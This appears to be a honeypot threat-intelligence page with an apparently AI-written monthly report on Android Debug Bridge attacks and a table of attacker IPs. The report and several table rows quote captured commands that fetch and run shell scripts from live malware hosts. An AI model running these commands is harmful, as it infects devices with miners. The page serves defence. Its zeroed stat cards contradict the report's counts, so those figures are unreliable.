Honeypot overview
ADB lure on 5555 with the telemetry laid bare.
Android Debug Bridge trap inside T-Pot CE. Indicators flow straight from the OTX STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.
NadSec Honeypot
Everything here is malicious on purpose. No production data.
Data source
T-Pot CE
Raw logs to STIX to OTX pulse.
Report author
Robert AI
Summaries and snark only.
Snapshot
November 2025 Pulse
Quick stats parsed from the current month STIX export.
Unique IP indicators
0
Distinct source IPs in the STIX bundle.
Hash indicators
0
File hashes associated with ADB activity.
Indicator objects
0
Total STIX indicator objects.
Signal strength
0
Plenty of brute-force automation; little human hands.
Scope
ADB-only indicators
Signals come strictly from the ADB honeypot STIX bundle. No cross-talk from other services.
What to do
Drop into deny lists
Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.
Caveats
Noisy on purpose
Tune to your risk appetite before auto-blocking anything in prod.
Monthly report
Robert's November 2025 brief
Threat Intelligence Report:
ADBHoney → Attacker IPs – Australia – November 2025
1. Executive Summary
If you left an Android Debug Bridge (ADB) port exposed in Australia this November, you weren’t just asking for trouble—you published an open invitation for the botnet goblins to hold a barbecue in your /data/local/tmp. Analysis of ADBHoney honeypot traffic for November 2025 shows the usual suspects running amok, led by Mirai’s less sophisticated but equally loud Android cousin: ADB.Miner. Infrastructure varies from “oops, forgot to lock down our cloud VM” all the way to “industrial-scale bulletproof bot-herding.” If you aren’t explicitly shipping a product that needs port 5555, it’s time to shut the gates and salt the earth.
2. Key Stats
- Monitoring period: November 2025
- Honeypot Location: Australia
- Primary Target: TCP/5555 (ADB)
- Event count per aggressive node: Up to 1,700+ events per single host
- Total unique attacker IPs captured: Dozens, geographically diverse
- Noteworthy ASNs: Pfcloud UG (NL), ColocaTel (DE), Optibounce (IR), DigitalOcean, Google Cloud, Akamai
- Observed TTPs:
- Mirai-style scanning and infection
- Mass download/execution of dropper scripts
- Common payloads:
trinity,log, generic shell droppers - Coinminer heritage, no command-and-control detected
- Malware file hashes captured: 30+ new SHA-256s for dropper binaries
3. Campaign Narrative
Here lies November’s grand tradition: mindless botnets rising from the malware bog to probe ADB/5555 and slop malware into any device that blinks in response. The heaviest action comes courtesy of bulletproof rental nodes out of the Netherlands and Germany (Pfcloud UG, ColocaTel, and kin), each vomiting hundreds to thousands of grossly similar ADB script drops and shell command attempts. Want your Android turned into a Monero mine shaft? This is how it starts.
The story is simple and repetitive: scan, find a sucker with ADB exposed, then spam wget/curl commands to drag down shell scripts and payloads (trinity, log, whatever is in fashion this week). Indie cloud VMs—DigitalOcean, Google, Akamai—get rented for drive-by scans. The main payload is still crypto-cowboy stuff, usually mining, all wrapped up in the wormy, Mirai-derived “push-and-pray” model.
The only thing missing is a C2 server with a neon sign. This campaign is a dumb, loud, and brutal army, not a stealth operation.
4. Infrastructure Details
Bulletproof Hosting and Heavy Hitters
- Pfcloud UG (NL), ColocaTel (DE), Optibounce (IR):
Main payload artillery. Massively overrepresented in events, seen pushing scripts and cleaning up their temp folders like digital raccoons. Example IPs:
176.65.148.34(245 events),176.65.149.243(223 events),193.142.147.209(1717 events, just showing off at this point).
Cloud Platforms (Disposable Minion Tier)
- DigitalOcean, Google Cloud, Akamai: Rent-a-node for opportunistic scanning. Moderate noise, likely to be tossed and re-registered faster than you can say “password123”.
Asia-based ISPs
- Vietnamese ISPs, Korea Telecom: In the middle tier. Show both scanning and actual payload deployment. A few do get creative with shell script chains.
Actual Malware Hosting
- Notably:
61.3.102.238(National Internet Backbone, IN) flagged asmalware_hosting—the greasy kitchen behind the ADB drive-thru.
Research Scanners (or, Actually, Not)
- None found—everyone here is genuinely misbehaving, not just poking in the name of science.
5. Malware and Behaviour
We’re in well-trodden Mirai country. Here’s the modus operandi, summed up:
Recon: Blasting every Australian ADB port they can find, always on TCP/5555.
Execution:
- Hits with commands like:
cd /data/local/tmp/; busybox wget http://<malware_host>/w.sh; sh w.sh; curl http://<malware_host>/c.sh; sh c.sh; wget http://<malware_host>/wget.sh; sh wget.sh - Launches binaries, e.g.
nohup /data/local/tmp/trinityornohup log - Survives reboots, sticks to tmp, could install a miner or worm.
- Hits with commands like:
Payload: Not many creative samples here—just dozens of nearly identical droppers, hashes all over the shop, but the MO is clear. No C2 channel observed, it’s “smash and grab” for hashing power.
References for the curious:
- netlab.360 research: Early warning – ADB.Miner is now rapidly spreading
- HKCERT report
- Sensorstechforum: Wormable ADB miner
6. Detection and Mitigation
If you’re still exposing ADB to the internet, you need to have a long, hard think about your life choices.
- Block or strictly limit inbound 5555/TCP anywhere not explicitly needed.
- Monitor for:
- Inbound connections from any IPs listed herein (Pfcloud, ColocaTel, etc.)
- New files/scripts in
/data/local/tmp/, especially namedtrinity,log, or after a forced package update.
- Hunt for signs of infection:
- Unusual CPU spikes (mining).
- Suspicious running procs:
nohup log,nohup trinity, anything in/data/local/tmp.
- Submit captured SHA-256s to sandboxes (VirusTotal, JoeSandbox, OTX) for behavioral clustering.
- Report abuse for cloud IPs (DigitalOcean, Google, Akamai) but don’t count on them fixing it before lunch.
- Blacklist high-volume, persistent bulletproof ASNs—they are poison for IoT, today and tomorrow.
7. Closing Thoughts
This campaign is the cyber equivalent of seagulls at a beach picnic: directionless, noisy, and ever-present. If your Android devices are still answering calls on 5555/TCP, you’re not defending, you’re feeding the flock. The attackers are not targeting you personally—they just want your box, your CPU, and your bandwidth for their little crypto dreams.
Block, monitor, cleanse. Above all, get ADB off the internet unless you enjoy hosting free compute for someone in a bulletproof hosting swamp. This is not a drill. These aren’t research pokes. This is automated, opportunistic abuse, and every day you don’t remediate, the mess grows.
Good luck out there—remember, every port 5555 left open is another invitation for goblin shenanigans.
STIX indicators
OTX pulse export
Parsed directly from the STIX bundle. Filter, search, and copy individual indicators for quick action.
| Type | Value | Description | Labels | Valid from | |
|---|---|---|---|---|---|
| IPv4 | 1.25.64.168 | Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 103.114.106.20 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 103.124.165.174 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=AL; asn=197706; asn_org=Keminet SHPK; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 103.14.224.2 | Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 103.176.113.222 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 103.183.119.48 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 103.231.249.52 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 103.30.10.48 | Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 104.248.130.34 | Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=DE; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 107.172.33.62 | Attacker IP • ADB / seen in ADBHoney; events=44; ports=5555; cc=US; asn=62164; asn_org=Heymman Servers Corporation; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 111.40.55.167 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=132525; asn_org=HeiLongJiang Mobile Communication Company Limited; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 112.162.95.31 | Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" | scanning_host | 2025-11-09 | |
| IPv4 | 112.87.194.251 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 112.90.220.244 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 112.90.220.246 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 116.113.74.122 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 129.212.176.143 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 129.212.188.153 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 134.209.77.110 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 135.148.113.216 | Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=16276; asn_org=OVH SAS; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 137.184.169.247 | Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 138.197.131.20 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 14.225.19.28 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 14.225.20.39 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl " | scanning_host | 2025-11-09 | |
| IPv4 | 142.93.199.16 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 142.93.255.85 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 143.110.171.108 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 143.42.164.182 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 146.190.241.56 | Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 146.70.188.236 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=BG; asn=9009; asn_org=M247 Europe SRL; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 147.185.132.231 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 147.185.132.255 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 152.32.204.217 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=JP; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 156.245.232.171 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=SC; asn=54801; asn_org=ZILLION-NETWORK; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 157.245.115.28 | Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 157.245.118.24 | Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 162.142.125.125 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 167.248.133.114 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 167.248.133.116 | Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 167.248.133.121 | Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 167.94.138.195 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 167.99.1.98 | Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 168.126.159.29 | Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 172.236.228.245 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 173.255.223.73 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 176.65.148.155 | Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s" | scanning_host | 2025-11-09 | |
| IPv4 | 176.65.148.34 | Attacker IP • ADB / seen in ADBHoney; events=245; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s" | scanning_host | 2025-11-09 | |
| IPv4 | 176.65.149.209 | Attacker IP • ADB / seen in ADBHoney; events=57; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s" | scanning_host | 2025-11-09 | |
| IPv4 | 176.65.149.243 | Attacker IP • ADB / seen in ADBHoney; events=223; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://ip/w.sh; sh w.sh; curl http://ip/c.sh; sh c.sh; wget http://ip/wget.s" | scanning_host | 2025-11-09 | |
| IPv4 | 178.22.24.61 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RU; asn=209290; asn_org=Galeon LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 183.232.212.194 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 183.232.212.195 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 184.105.247.195 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 184.105.247.196 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 184.105.247.203 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 184.105.247.216 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.170.144.3 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=EE; asn=197414; asn_org=Xhost Internet Solutions Lp; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.217.0.181 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.224.128.14 | Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.224.128.19 | Attacker IP • ADB / seen in ADBHoney; events=33; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.242.226.59 | Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.243.96.116 | Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=UA; asn=48693; asn_org=Rices Privately owned enterprise; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 185.91.69.5 | Attacker IP • ADB / seen in ADBHoney; events=69; ports=5555; cc=GB; asn=201579; asn_org=Hostgnome Ltd; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 186.220.88.42 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=BR; asn=28573; asn_org=Claro NXT Telecomunicacoes Ltda; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 188.92.79.113 | Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=LV; asn=43513; asn_org=Sia Nano IT; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 193.138.7.191 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=FI; asn=50304; asn_org=Blix Solutions AS; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 193.142.147.209 | Attacker IP • ADB / seen in ADBHoney; events=1717; ports=5555; cc=DE; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./ar" | scanning_host | 2025-11-09 | |
| IPv4 | 193.37.69.113 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RU; asn=213194; asn_org=Nechaev Dmitry Sergeevich; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 194.164.107.5 | Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=50219; asn_org=VT-255-50219; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 194.180.48.148 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=201814; asn_org=MEVSPACE sp. z o.o.; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 194.187.176.130 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=208843; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 194.187.176.149 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=DE; asn=208843; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 194.187.178.202 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 194.187.178.95 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 196.251.81.89 | Attacker IP • ADB / seen in ADBHoney; events=39; ports=5555; cc=SC; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 196.251.84.60 | Attacker IP • ADB / seen in ADBHoney; events=42; ports=5555; cc=NL; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 196.251.84.86 | Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=NL; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 197.0.29.184 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=TN; asn=37705; asn_org=TOPNET; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 198.235.24.43 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 198.235.24.75 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 198.235.24.76 | Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 20.163.57.193 | Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=8075; asn_org=MICROSOFT-CORP-MSN-AS-BLOCK; cats=Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 20.65.194.111 | Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=8075; asn_org=MICROSOFT-CORP-MSN-AS-BLOCK; cats=Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 204.76.203.28 | Attacker IP • ADB / seen in ADBHoney; events=45; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 205.210.31.167 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 205.210.31.232 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 205.210.31.71 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 205.210.31.76 | Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 206.168.34.198 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 206.168.34.205 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 206.168.34.212 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 206.168.34.37 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 206.189.120.50 | Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=GB; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
